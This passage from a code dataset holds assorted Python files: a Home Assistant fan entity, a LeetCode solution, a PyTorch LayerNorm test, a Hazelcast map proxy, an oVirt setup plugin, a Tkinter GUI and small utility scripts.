system_id: int, ventilation: VentilationSystem):\n \"\"\"Init.\"\"\"\n super().__init__(uplink, system_id)\n\n self._ventilation = ventilation\n self.entity_id = ENTITY_ID_FORMAT.format(\n \"{}_{}_{}\".format(DOMAIN_NIBE, system_id, str(ventilation.name).lower())\n )\n\n self.get_parameters(\n [\n ventilation.fan_speed,\n ventilation.ventilation_boost,\n ventilation.extract_air,\n ventilation.exhaust_speed_normal,\n ventilation.exhaust_air,\n ventilation.exhaust_speed_1,\n ventilation.exhaust_speed_2,\n ventilation.exhaust_speed_3,\n ventilation.exhaust_speed_4,\n ]\n )\n\n @property\n def name(self):\n \"\"\"Return name of entity.\"\"\"\n return self._ventilation.name\n\n @property\n def is_on(self):\n \"\"\"Return true if the entity is on.\"\"\"\n return self.get_value(self._ventilation.fan_speed) is not None\n\n @property\n def state(self) -> str:\n \"\"\"Return current fan state.\"\"\"\n return self.get_value(self._ventilation.fan_speed)\n\n @property\n def speed(self) -> str:\n \"\"\"Return the current speed.\"\"\"\n boost = 
self.get_raw(self._ventilation.ventilation_boost)\n return NIBE_BOOST_TO_SPEED.get(boost, str(boost))\n\n @property\n def speed_list(self) -> list:\n \"\"\"Get the list of available speeds.\"\"\"\n return list(NIBE_BOOST_TO_SPEED.values())\n\n @property\n def state_attributes(self) -> dict:\n \"\"\"Return optional state attributes.\n\n Override base class state_attributes to support device-specific attributes.\n \"\"\"\n data = super().state_attributes\n data.update(self.device_state_attributes)\n return data\n\n @property\n def device_state_attributes(self) -> Dict[str, Optional[str]]:\n \"\"\"Return extra state.\"\"\"\n data = {}\n data[\"fan_speed\"] = self.get_value(self._ventilation.fan_speed)\n data[\"fan_speed_raw\"] = self.get_raw(self._ventilation.fan_speed)\n data[\"extract_air\"] = self.get_value(self._ventilation.extract_air)\n data[\"exhaust_air\"] = self.get_value(self._ventilation.exhaust_air)\n data[\"ventilation_boost\"] = self.get_value(self._ventilation.ventilation_boost)\n data[\"ventilation_boost_raw\"] = self.get_raw(\n self._ventilation.ventilation_boost\n )\n return data\n\n # pylint: disable=arguments-differ\n async def async_turn_on(self, speed: str = None, **kwargs) -> None:\n \"\"\"Turn on the fan.\"\"\"\n await self.async_set_speed(speed or SPEED_AUTO)\n\n async def async_set_speed(self, speed: str) -> None:\n \"\"\"Set the speed of the fan.\"\"\"\n if speed in HA_SPEED_TO_NIBE and self._ventilation.ventilation_boost:\n await self._uplink.put_parameter(\n self._system_id,\n self._ventilation.ventilation_boost,\n HA_SPEED_TO_NIBE[speed],\n )\n else:\n _LOGGER.error(\"Unsupported speed %s\", speed)\n raise NotImplementedError()\n\n @property\n def supported_features(self) -> int:\n \"\"\"Flag supported features.\"\"\"\n return SUPPORT_SET_SPEED\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return a unique identifier for this parameter.\"\"\"\n return \"{}_{}\".format(self._system_id, self._ventilation.fan_speed)\n","sub_path":"custom_components/nibe/fan.py","file_name":"fan.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197047553","text":"class Solution:\r\n def checkInclusion(self, s1: str, s2: str) -> bool:\r\n # a = collections.Counter(s1)\r\n # n1 = len(s1)\r\n # n2 = len(s2)\r\n\r\n # for i in range(0, n2 - n1 + 1):\r\n # if Counter(s2[i: i + n1]) == a:\r\n # return True\r\n # return False\r\n if len(s1) > len(s2):\r\n return False\r\n\r\n s1_count = [0] * 26\r\n\r\n s2_count = [0] * 26\r\n\r\n for i in range(len(s1)):\r\n s1_count[ord(s1[i]) - ord('a')] += 1\r\n s2_count[ord(s2[i]) - ord('a')] += 1\r\n\r\n matches = 0\r\n\r\n for i in range(26):\r\n matches += (1 if s1_count[i] == s2_count[i] else 0)\r\n\r\n l = 0\r\n\r\n for r in range(len(s1), len(s2)):\r\n if matches == 26:\r\n return True\r\n\r\n index = ord(s2[r]) - ord('a')\r\n s2_count[index] += 1\r\n\r\n if s1_count[index] == s2_count[index]:\r\n matches += 1\r\n elif s1_count[index] + 1 == s2_count[index]:\r\n matches -= 1\r\n\r\n index = ord(s2[l]) - ord('a')\r\n s2_count[index] -= 1\r\n\r\n if s1_count[index] == s2_count[index]:\r\n matches += 1\r\n elif s1_count[index] - 1 == s2_count[index]:\r\n matches -= 1\r\n\r\n l += 1\r\n\r\n return matches == 26\r\n","sub_path":"permutation-in-string.py","file_name":"permutation-in-string.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"380955831","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass TestLayerNorm(nn.Module):\n def __init__(self):\n super(TestLayerNorm, self).__init__()\n self.input = torch.randn(20, 5, 10, 10)\n self.a = nn.Parameter(torch.ones_like(self.input))\n self.b = nn.Parameter(torch.zeros_like(self.input))\n\n # With Learnable Parameters\n self.m1 = nn.LayerNorm(self.input.size()[1:])\n # Without Learnable Parameters\n self.m2 = nn.LayerNorm(self.input.size()[1:], elementwise_affine=False)\n # Normalize over last two dimensions\n self.m3 = nn.LayerNorm([10, 10], eps=1e-05)\n # Normalize over last dimension of size 10\n self.m4 = nn.LayerNorm(10, eps=1e-05)\n \n\n def forward(self, x=None, mode='1'):\n # explicit None check: truth-testing a multi-element tensor raises a RuntimeError\n if x is not None:\n result = getattr(self, 'm'+mode)(x)\n print(f'* x : \\n{x.size()}')\n print(f'* result : \\n{result.size()}')\n return result\n else:\n result = getattr(self, 'm'+mode)(self.input)\n print(f'* x : \\n{self.input.size()}')\n print(f' - max : {torch.max(self.input)}')\n print(f' - min : {torch.min(self.input)}')\n print(f'* result : \\n{result.size()}')\n print(f' - max : {torch.max(result)}')\n print(f' - min : {torch.min(result)}')\n return result\n\n def validation(self, mode='1'):\n if mode == '1':\n numerator = self.input.sub(self.input.mean(dim=(-1, -2, -3), keepdim=True))\n denominator = self.input.var(dim=(-1, -2, -3), keepdim=True).add(1e-05).sqrt()\n result = numerator/denominator\n result = self.a*result + self.b \n\n elif mode == '2':\n numerator = self.input.sub(self.input.mean(dim=(-1, -2, -3), keepdim=True))\n denominator = self.input.var(dim=(-1, -2, -3), keepdim=True).add(1e-05).sqrt()\n \n a = torch.tensor(1.)\n b = torch.tensor(0.)\n result = numerator/denominator\n result = a*result + b \n\n elif mode == '3':\n numerator = self.input.sub(self.input.mean(dim=(-1, -2), keepdim=True))\n denominator = self.input.var(dim=(-1, -2), keepdim=True).add(1e-05).sqrt()\n result = numerator/denominator\n result = self.a*result + self.b \n\n elif mode == '4':\n numerator = self.input.sub(self.input.mean(dim=-1, keepdim=True))\n denominator = self.input.var(dim=-1, keepdim=True).add(1e-05).sqrt()\n result = numerator/denominator\n result = self.a*result + self.b\n\n print(f'* result : \\n{result.size()}')\n print(f' - max : {torch.max(result)}')\n print(f' - min : {torch.min(result)}')\n return result\n\n\n\n# official\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module (See citation for details).\"\n\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\n\ndef main():\n # validation\n layernorm = TestLayerNorm()\n layernorm(mode='4')\n layernorm.validation(mode='4')\n \n\n # official\n x = torch.Tensor(20,5,10,10).uniform_(0,1)\n layernorm = LayerNorm(x.size(-1))\n result = layernorm(x); print(f'* result : {result.size()}')\n print(f' - max : {torch.max(result)}')\n print(f' - min : {torch.min(result)}')\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"Fundamental_of_deep_learning/pytorch/module-nn/layer_norm.py","file_name":"layer_norm.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582349757","text":"import 
itertools\nfrom hazelcast.future import combine_futures, ImmediateFuture\nfrom hazelcast.protocol.codec import map_add_entry_listener_codec, map_add_entry_listener_to_key_codec, \\\n map_add_entry_listener_with_predicate_codec, map_add_entry_listener_to_key_with_predicate_codec, \\\n map_add_index_codec, map_clear_codec, map_contains_key_codec, map_contains_value_codec, map_delete_codec, \\\n map_entry_set_codec, map_entries_with_predicate_codec, map_evict_codec, map_evict_all_codec, map_flush_codec, \\\n map_force_unlock_codec, map_get_codec, map_get_all_codec, map_get_entry_view_codec, map_is_empty_codec, \\\n map_is_locked_codec, map_key_set_codec, map_key_set_with_predicate_codec, map_load_all_codec, \\\n map_load_given_keys_codec, map_lock_codec, map_put_codec, map_put_all_codec, map_put_if_absent_codec, \\\n map_put_transient_codec, map_size_codec, map_remove_codec, map_remove_if_same_codec, \\\n map_remove_entry_listener_codec, map_replace_codec, map_replace_if_same_codec, map_set_codec, map_try_lock_codec, \\\n map_try_put_codec, map_try_remove_codec, map_unlock_codec, map_values_codec, map_values_with_predicate_codec, \\\n map_add_interceptor_codec, map_execute_on_all_keys_codec, map_execute_on_key_codec, map_execute_on_keys_codec, \\\n map_execute_with_predicate_codec\nfrom hazelcast.proxy.base import Proxy, EntryEvent, EntryEventType, get_entry_listener_flags\nfrom hazelcast.util import check_not_none, thread_id, to_millis\n\n\nclass Map(Proxy):\n def add_entry_listener(self, include_value=False, key=None, predicate=None, added=None, removed=None, updated=None,\n evicted=None, evict_all=None, clear_all=None, merged=None, expired=None):\n flags = get_entry_listener_flags(added=added, removed=removed, updated=updated,\n evicted=evicted, evict_all=evict_all, clear_all=clear_all, merged=merged,\n expired=expired)\n\n if key and predicate:\n key_data = self._to_data(key)\n predicate_data = self._to_data(predicate)\n request = map_add_entry_listener_to_key_with_predicate_codec.encode_request(self.name, key_data,\n predicate_data, include_value,\n flags, False)\n elif key and not predicate:\n key_data = self._to_data(key)\n request = map_add_entry_listener_to_key_codec.encode_request(self.name, key_data, include_value, flags,\n False)\n elif not key and predicate:\n predicate = self._to_data(predicate)\n request = map_add_entry_listener_with_predicate_codec.encode_request(self.name, predicate, include_value,\n flags, False)\n else:\n request = map_add_entry_listener_codec.encode_request(self.name, include_value, flags, False)\n\n def handle_event_entry(**_kwargs):\n event = EntryEvent(self._to_object, **_kwargs)\n if event.event_type == EntryEventType.added:\n added(event)\n elif event.event_type == EntryEventType.removed:\n removed(event)\n elif event.event_type == EntryEventType.updated:\n updated(event)\n elif event.event_type == EntryEventType.evicted:\n evicted(event)\n elif event.event_type == EntryEventType.evict_all:\n evict_all(event)\n elif event.event_type == EntryEventType.clear_all:\n clear_all(event)\n elif event.event_type == EntryEventType.merged:\n merged(event)\n elif event.event_type == EntryEventType.expired:\n expired(event)\n\n return self._start_listening(request,\n lambda m: map_add_entry_listener_codec.handle(m,\n handle_event_entry),\n lambda r: map_add_entry_listener_codec.decode_response(r)[\n 'response'])\n\n def add_index(self, attribute, ordered=False):\n return self._encode_invoke(map_add_index_codec, attribute=attribute, ordered=ordered)\n\n def 
add_interceptor(self, interceptor):\n return self._encode_invoke(map_add_interceptor_codec, interceptor=self._to_data(interceptor))\n\n def clear(self):\n return self._encode_invoke(map_clear_codec)\n\n def contains_key(self, key):\n \"\"\"\n :param key:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_contains_key_codec, key_data,\n key=key_data, thread_id=thread_id())\n\n def contains_value(self, value):\n check_not_none(value, \"value can't be None\")\n value_data = self._to_data(value)\n return self._encode_invoke(map_contains_value_codec, value=value_data)\n\n def delete(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_delete_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def entry_set(self, predicate=None):\n if predicate:\n predicate_data = self._to_data(predicate)\n return self._encode_invoke(map_entries_with_predicate_codec, predicate=predicate_data)\n else:\n return self._encode_invoke(map_entry_set_codec)\n\n def evict(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_evict_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def evict_all(self):\n return self._encode_invoke(map_evict_all_codec)\n\n def execute_on_entries(self, entry_processor, predicate=None):\n if predicate:\n return self._encode_invoke(map_execute_with_predicate_codec, entry_processor=self._to_data(entry_processor),\n predicate=self._to_data(predicate))\n return self._encode_invoke(map_execute_on_all_keys_codec, entry_processor=self._to_data(entry_processor))\n\n def execute_on_key(self, key, entry_processor):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_execute_on_key_codec, key_data, key=key_data,\n entry_processor=self._to_data(entry_processor), thread_id=thread_id())\n\n def execute_on_keys(self, keys, entry_processor):\n key_list = []\n for key in keys:\n check_not_none(key, \"key can't be None\")\n key_list.append(self._to_data(key))\n\n return self._encode_invoke(map_execute_on_keys_codec, entry_processor=self._to_data(entry_processor),\n keys=key_list)\n\n def flush(self):\n return self._encode_invoke(map_flush_codec)\n\n def force_unlock(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_force_unlock_codec, key_data, key=key_data)\n\n def get(self, key):\n \"\"\"\n :param key:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_get_codec, key_data, key=key_data, thread_id=thread_id())\n\n def get_all(self, keys):\n check_not_none(keys, \"keys can't be None\")\n if not keys:\n return ImmediateFuture({})\n\n partition_service = self._client.partition_service\n partition_to_keys = {}\n\n for key in keys:\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n partition_id = partition_service.get_partition_id(key_data)\n try:\n partition_to_keys[partition_id].append(key_data)\n except KeyError:\n partition_to_keys[partition_id] = [key_data]\n\n futures = []\n for partition_id, key_list in partition_to_keys.iteritems():\n future = self._encode_invoke_on_partition(map_get_all_codec, partition_id, keys=key_list)\n futures.append(future)\n\n def merge(f):\n return 
dict(itertools.chain(*f.result()))\n\n return combine_futures(*futures).continue_with(merge)\n\n def get_entry_view(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_get_entry_view_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def is_empty(self):\n return self._encode_invoke(map_is_empty_codec)\n\n def is_locked(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_is_locked_codec, key_data, key=key_data)\n\n def key_set(self, predicate=None):\n if predicate:\n predicate_data = self._to_data(predicate)\n return self._encode_invoke(map_key_set_with_predicate_codec, predicate=predicate_data)\n else:\n return self._encode_invoke(map_key_set_codec)\n\n def load_all(self, keys=None, replace_existing_values=True):\n if keys:\n key_data_list = map(self._to_data, keys)\n return self._encode_invoke(map_load_given_keys_codec, keys=key_data_list,\n replace_existing_values=replace_existing_values)\n else:\n return self._encode_invoke(map_load_all_codec,\n replace_existing_values=replace_existing_values)\n\n def lock(self, key, ttl=-1):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_lock_codec, key_data, key=key_data, thread_id=thread_id(),\n ttl=to_millis(ttl))\n\n def put(self, key, value, ttl=-1):\n \"\"\"\n :param key:\n :param value:\n :param ttl:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_put_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id(),\n ttl=to_millis(ttl))\n\n def put_all(self, map):\n check_not_none(map, \"map can't be None\")\n if not map:\n return ImmediateFuture(None)\n\n partition_service = self._client.partition_service\n partition_map = {}\n\n for key, value in map.iteritems():\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n entry = (self._to_data(key), self._to_data(value))\n partition_id = partition_service.get_partition_id(entry[0])\n try:\n partition_map[partition_id].append(entry)\n except KeyError:\n partition_map[partition_id] = [entry]\n\n futures = []\n for partition_id, entry_list in partition_map.iteritems():\n future = self._encode_invoke_on_partition(map_put_all_codec, partition_id,\n entries=dict(entry_list))\n futures.append(future)\n\n return combine_futures(*futures)\n\n def put_if_absent(self, key, value, ttl=-1):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n\n return self._encode_invoke_on_key(map_put_if_absent_codec, key_data, key=key_data,\n value=value_data, thread_id=thread_id(), ttl=to_millis(ttl))\n\n def put_transient(self, key, value, ttl=-1):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_put_transient_codec, key_data, key=key_data,\n value=value_data, thread_id=thread_id(), ttl=to_millis(ttl))\n\n def remove(self, key):\n check_not_none(key, \"key can't be None\")\n key_data = self._to_data(key)\n return self._encode_invoke_on_key(map_remove_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n 
def remove_if_same(self, key, value):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_remove_if_same_codec, key_data, key=key_data,\n value=value_data, thread_id=thread_id())\n\n def remove_entry_listener(self, registration_id):\n return self._stop_listening(registration_id,\n lambda i: map_remove_entry_listener_codec.encode_request(self.name, i))\n\n def replace(self, key, value):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n\n return self._encode_invoke_on_key(map_replace_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id())\n\n def replace_if_same(self, key, old_value, new_value):\n check_not_none(key, \"key can't be None\")\n check_not_none(old_value, \"old_value can't be None\")\n check_not_none(new_value, \"new_value can't be None\")\n\n key_data = self._to_data(key)\n old_value_data = self._to_data(old_value)\n new_value_data = self._to_data(new_value)\n\n return self._encode_invoke_on_key(map_replace_if_same_codec, key_data, key=key_data,\n test_value=old_value_data,\n value=new_value_data, thread_id=thread_id())\n\n def set(self, key, value, ttl=-1):\n \"\"\"\n :param key:\n :param value:\n :param ttl:\n :return:\n \"\"\"\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n return self._encode_invoke_on_key(map_set_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id(),\n ttl=to_millis(ttl))\n\n def size(self):\n return self._encode_invoke(map_size_codec)\n\n def try_lock(self, key, ttl=-1, timeout=0):\n check_not_none(key, \"key can't be None\")\n\n key_data = self._to_data(key)\n\n return self._encode_invoke_on_key(map_try_lock_codec, key_data, key=key_data,\n thread_id=thread_id(), lease=to_millis(ttl), timeout=to_millis(timeout))\n\n def try_put(self, key, value, timeout=0):\n check_not_none(key, \"key can't be None\")\n check_not_none(value, \"value can't be None\")\n\n key_data = self._to_data(key)\n value_data = self._to_data(value)\n\n return self._encode_invoke_on_key(map_try_put_codec, key_data, key=key_data, value=value_data,\n thread_id=thread_id(), timeout=to_millis(timeout))\n\n def try_remove(self, key, timeout=0):\n check_not_none(key, \"key can't be None\")\n\n key_data = self._to_data(key)\n\n return self._encode_invoke_on_key(map_try_remove_codec, key_data, key=key_data,\n thread_id=thread_id(), timeout=to_millis(timeout))\n\n def unlock(self, key):\n check_not_none(key, \"key can't be None\")\n\n key_data = self._to_data(key)\n\n return self._encode_invoke_on_key(map_unlock_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def values(self, predicate=None):\n if predicate:\n predicate_data = self._to_data(predicate)\n return self._encode_invoke(map_values_with_predicate_codec, predicate=predicate_data)\n else:\n return self._encode_invoke(map_values_codec)\n","sub_path":"hazelcast/proxy/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":16963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324573051","text":"# Created by PyCharm Pro Edition \r\n# User: Kaushik Talukdar \r\n# Date: 01-04-17 \r\n# Time: 02:59 AM\r\n\r\n# we can use while to make the user determine 
when to quit the loop\r\n\r\ni=1\r\nflag = True\r\nwhile flag:\r\n print(1*i)\r\n i += 1\r\n opinion = input(\"Enter 0 to stop the process: \")\r\n if opinion == '0':\r\n flag = False\r\n else:\r\n flag = True\r\n\r\n# we have designed the program such that only upon inputting 0 will the program stop\r\n# even inputting 00 or 000 will have no effect on the program","sub_path":"6. User Input and While Loops/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438163053","text":"#\n# ovirt-engine-setup -- ovirt engine setup\n# Copyright (C) 2013-2015 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\n\"\"\"Apache root plugin.\"\"\"\n\n\nimport gettext\n\nfrom otopi import constants as otopicons\nfrom otopi import filetransaction, plugin, util\n\nfrom ovirt_engine_setup import constants as osetupcons\nfrom ovirt_setup_lib import dialog\nfrom ovirt_engine_setup.engine_common import constants as oengcommcons\n\n\ndef _(m):\n return gettext.dgettext(message=m, domain='ovirt-engine-setup')\n\n\n@util.export\nclass Plugin(plugin.PluginBase):\n \"\"\"Apache root plugin.\"\"\"\n\n def __init__(self, context):\n super(Plugin, self).__init__(context=context)\n self._enabled = True\n\n @plugin.event(\n stage=plugin.Stages.STAGE_INIT,\n )\n def _init(self):\n self.environment.setdefault(\n oengcommcons.ApacheEnv.HTTPD_CONF_OVIRT_ROOT,\n oengcommcons.FileLocations.HTTPD_CONF_OVIRT_ROOT\n )\n self.environment.setdefault(\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION,\n None\n )\n self.environment.setdefault(\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTIOND_DEFAULT,\n False\n )\n\n @plugin.event(\n stage=plugin.Stages.STAGE_SETUP,\n condition=lambda self: self._enabled,\n )\n def _setup(self):\n if (\n self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ] is None and\n (\n self.environment[\n osetupcons.CoreEnv.DEVELOPER_MODE\n ] or\n self.environment[\n oengcommcons.ApacheEnv.CONFIGURED\n ]\n )\n ):\n self._enabled = False\n\n @plugin.event(\n stage=plugin.Stages.STAGE_CUSTOMIZATION,\n before=(\n oengcommcons.Stages.DIALOG_TITLES_E_APACHE,\n ),\n after=(\n oengcommcons.Stages.DIALOG_TITLES_S_APACHE,\n ),\n condition=lambda self: (\n self.environment[oengcommcons.ApacheEnv.ENABLE] and\n self._enabled\n ),\n )\n def _customization(self):\n if self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ] is None:\n self.dialog.note(\n _(\n 'Setup can configure the default page of the '\n 'web server to present the application home page. '\n 'This may conflict with existing applications.'\n )\n )\n self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ] = dialog.queryBoolean(\n dialog=self.dialog,\n name='OVESETUP_APACHE_CONFIG_ROOT_REDIRECTION',\n note=_(\n 'Do you wish to set the application as the default page '\n 'of the web server? 
(@VALUES@) [@DEFAULT@]: '\n ),\n prompt=True,\n default=self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTIOND_DEFAULT\n ],\n )\n\n self._enabled = self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ]\n\n @plugin.event(\n stage=plugin.Stages.STAGE_MISC,\n condition=lambda self: (\n self.environment[oengcommcons.ApacheEnv.ENABLE] and\n self._enabled\n ),\n )\n def _misc(self):\n with open(\n oengcommcons.FileLocations.HTTPD_CONF_OVIRT_ROOT_TEMPLATE,\n 'r'\n ) as f:\n content = f.read()\n\n self.environment[oengcommcons.ApacheEnv.NEED_RESTART] = True\n self.environment[otopicons.CoreEnv.MAIN_TRANSACTION].append(\n filetransaction.FileTransaction(\n name=self.environment[\n oengcommcons.ApacheEnv.HTTPD_CONF_OVIRT_ROOT\n ],\n content=content,\n modifiedList=self.environment[\n otopicons.CoreEnv.MODIFIED_FILES\n ],\n )\n )\n\n\n# vim: expandtab tabstop=4 shiftwidth=4\n","sub_path":"packaging/setup/plugins/ovirt-engine-setup/ovirt-engine/apache/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161405953","text":"# pylint: disable-all\n# flake8: noqa\n# type: ignore\n\"\"\"Summary.\"\"\"\n\nfrom typing import Any, List\n\nfrom falcon import Request, Response, abort\n\nfrom src.http_invoker import HttpInvoker\n\n\nclass FalconHttpInvoker(HttpInvoker):\n\n \"\"\"Summary\"\"\"\n\n def __init__(self, invocable: Any):\n \"\"\"Summary\n\n Args:\n invocable (Any): Description\n \"\"\"\n # super() already binds self; passing it again would hand it in as an extra argument\n super().__init__(invocable)\n\n def on_get(self, request: Request, response: Response) -> None:\n \"\"\"Summary\n\n Args:\n request (Request): Description\n response (Response): Description\n \"\"\"\n data_out: List[Any] = []\n data_in: List[Any] = request.params\n # data_in(f'route: {str(request.url_rule)}')\n try:\n self._invocable.invoke(data_in, data_out)\n except Exception as err:\n print(str(err))\n abort(400)\n\n response.body = str(data_out)\n","sub_path":"src/falcon_http_invoker.py","file_name":"falcon_http_invoker.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144660988","text":"import csv\r\n\r\nwith open('Height-Weight.csv',newline='')as f:\r\n reader=csv.reader(f)\r\n file_data=list(reader)\r\n\r\n#to pop the titles out of the list\r\nfile_data.pop(0)\r\n\r\n#sorting data to get the height of the ppl which is in first position\r\nnew_data=[]\r\n\r\nfor i in range(len(file_data)):\r\n n_num=file_data[i][1]\r\n new_data.append(float(n_num))\r\n\r\nn=len(new_data)\r\nnew_data.sort()\r\n\r\n#using floor division to get the nearest whole number\r\nif n%2==0:\r\n #getting the first number\r\n median1=float(new_data[n//2])\r\n #getting the second number\r\n median2=float(new_data[n//2-1])\r\n #getting the mean of those numbers\r\n median=(median1+median2)/2\r\nelse:\r\n median=new_data[n//2]\r\n\r\nprint(\"median is: \"+str(median))","sub_path":"median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"172368258","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Saturday, November 3, 2018, 2:25:35 PM\r\n\r\n@author: RI\r\n\"\"\"\r\nfrom tkinter import N, S, W, E, Frame, Button\r\nfrom tkinter.ttk import Treeview, Scrollbar\r\n\r\n\r\nclass SalesLoftGUI(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n 
master.title(\"SalesLoft People Data\")\n self.pack()\n \n self.frameButtons = Frame(self)\n self.frameButtons.pack()\n \n def addTable(self, data, columns, columnNames):\n #Set up the table\n frame = Frame(self)\n frame.pack() \n \n tv = Treeview(frame)\n tv.pack(side=\"left\") \n \n vsb = Scrollbar(frame, orient=\"vertical\", command=tv.yview)\n vsb.pack(side='right', fill='y')\n \n tv.configure(yscrollcommand=vsb.set)\n \n #Set up the first column\n tv.heading(\"#0\", text=columnNames[0])\n tv['columns'] = tuple(columns[1:])\n \n #Set up the remaining columns\n for col, colName in zip(columns[1:], columnNames[1:]):\n tv.heading(col, text=colName)\n \n #Add the data\n for d in data:\n row = []\n for c in columns[1:]: \n row.append(d[c])\n tv.insert('', 'end', text=d[columns[0]], values = tuple(row))\n \n\n def addButton(self, buttonText, onClick):\n b = Button(self.frameButtons, text=buttonText, command=onClick)\n b.pack(side=\"left\")\n","sub_path":"SalesLoftGui.py","file_name":"SalesLoftGui.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"460926549","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport decimal\nimport datetime\n\nimport extrathick\n\ndef dt_display (dt):\n return (dt - datetime.timedelta(hours=4)).strftime(\"%l:%M:%S%p\").lower()\n\ndef decimal_display (n):\n if n % decimal.Decimal(\"0.01\"):\n return str(n)\n else:\n return format(n, \".2f\")\n\ndef main (arg0, argv):\n cutoff = datetime.datetime(2018, 9, 25)\n min_price = None\n max_price = None\n with open(argv[0], mode=\"rt\") as fp:\n for line in fp:\n dt, price = line.split()\n dt = extrathick.dt_deserialize(dt)\n price = decimal.Decimal(price)\n if dt <= cutoff:\n continue\n #print(dt_display(dt), decimal_display(price))\n if min_price is None or price < min_price[\"price\"]:\n min_price = {\n \"price\": price,\n \"dt\": dt,\n }\n if max_price is None or price > max_price[\"price\"]:\n max_price = {\n \"price\": price,\n \"dt\": dt,\n }\n print(f\"{dt_display(min_price['dt'])}: {decimal_display(min_price['price'])}\")\n print(f\"{dt_display(max_price['dt'])}: {decimal_display(max_price['price'])}\")\n\nif __name__ == \"__main__\":\n try:\n c = main(sys.argv[0], 